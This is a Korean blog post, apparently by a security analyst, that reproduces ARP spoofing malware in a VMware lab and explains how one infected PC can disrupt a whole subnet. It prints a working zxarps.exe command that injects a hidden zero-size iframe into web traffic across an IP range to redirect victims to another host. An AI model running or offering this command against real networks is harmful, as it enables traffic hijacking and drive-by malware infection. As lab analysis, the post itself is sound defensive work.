ARP Spoofing 기법을 이용한 악성코드

작년 7월경으로 기억된다. 동시다발적으로 수많은 기업의 보안 담당자들이 전화를 걸어 물어왔던 ARP

Spoofing... 특정한 네트웍 대역에서만 웹 페이지에 대한 접속이 정상적이지 않은 경우, 그럼에도 불구하고 해당 증상이 발생하는 PC에서는 어떠한 악성코드의 감염 흔적도 찾아 볼 수 없는 경우! 

 

이런 경우의 대부분이 ARP Spoofing 을 이용한 악성코드에 감염 되었다고 추측해 볼 수 있으며, 해당 악성코드가 감염되어 사용중인 특정 네트웍 대역의 1대 또는 다수의 PC에서, 동일 네트웍 대역의 Default Gateway 쪽으로 감시 패킷을 지속적으로 보냄으로써 발생되는 전형적인 증상이라고 말할 수 있다.

 

아래의 글은 작년 7월에 ARP Spoofing 기법을 이용한 악성코드가 활개를 칠 당시, 긴급히 샘플을 입수하여

해당 증상을 그대로 시현해 본 후의 결과이다.

 

 

1. 시험환경

 

VMware에서 두개의 OS를 부팅하고 동일한 Gateway를 사용하도록 NAT를 이용한 네트웍 설정.

 

 

2. 시험 방법

 

Step 1. 샘플로 입수된 악성코드 분석 후 그 안에 있던 여러가지 파라미터를 이용하여 아래의 명령 실행.

  
           (192.168.124.1 ~ 192.168.124.150 번을 Sniffing 하여 80  Port가 오픈되면 해당 URL을

             삽입하도록 하는  명령어)
           

            -> zxarps.exe -idx 0 -ip 192.168.124.1-192.168.124.150 -port 80 -insert
           "<iframe src='http://Target IP' width=0 height=0>"

Step 2. 명령이 성공하면 Alive Host 목록이 화면에 표기되며 Sniffing.. 상태로 대기.

<Attacker>

Step 3. Victim Host에서 http://www.microsoft.co.kr 웹 사이트로 접속 시도

Step 4. 웹 브라우저 좌측 하단에서 정의된 IFRAME CODE 로 Redirection 이 되는지 확인.

Setp 5. Attacker PC에서 "성공! 코드삽입" 로그 확인. 

3. 시험 결과

 

시험 결과는 위에서 보는 그림과 같다. 만약 시험 대상으로 쓰였던 악성코드가, 기업 또는 관공서에서 사용하는 PC중 단 1대에서만 실제 감염이 되었다고 가정한다 하더라도, 하나의 네트웍이 C Class 를 사용하는 경우라면 최대 250대 정도의 정상적인 PC들이 단 1대의 Victim host로 인해 250대 모두가 악성코드에 감염된 것과 같은 동일한 증상이 발생할 수 있는 것이다.

 

지금의 트렌드는 Autorun.inf 파일을 이용하여 보조저장매체를 통한 감염 루트가 주를 이루고 있지만, ARP Spoofing 을 이용한 악성코드가 첨 발견되었을때만 해도 제작자가 참으로 존경스럽게까지 느껴질 정도로 감탄을 했었던 기억이 새록새록 하다.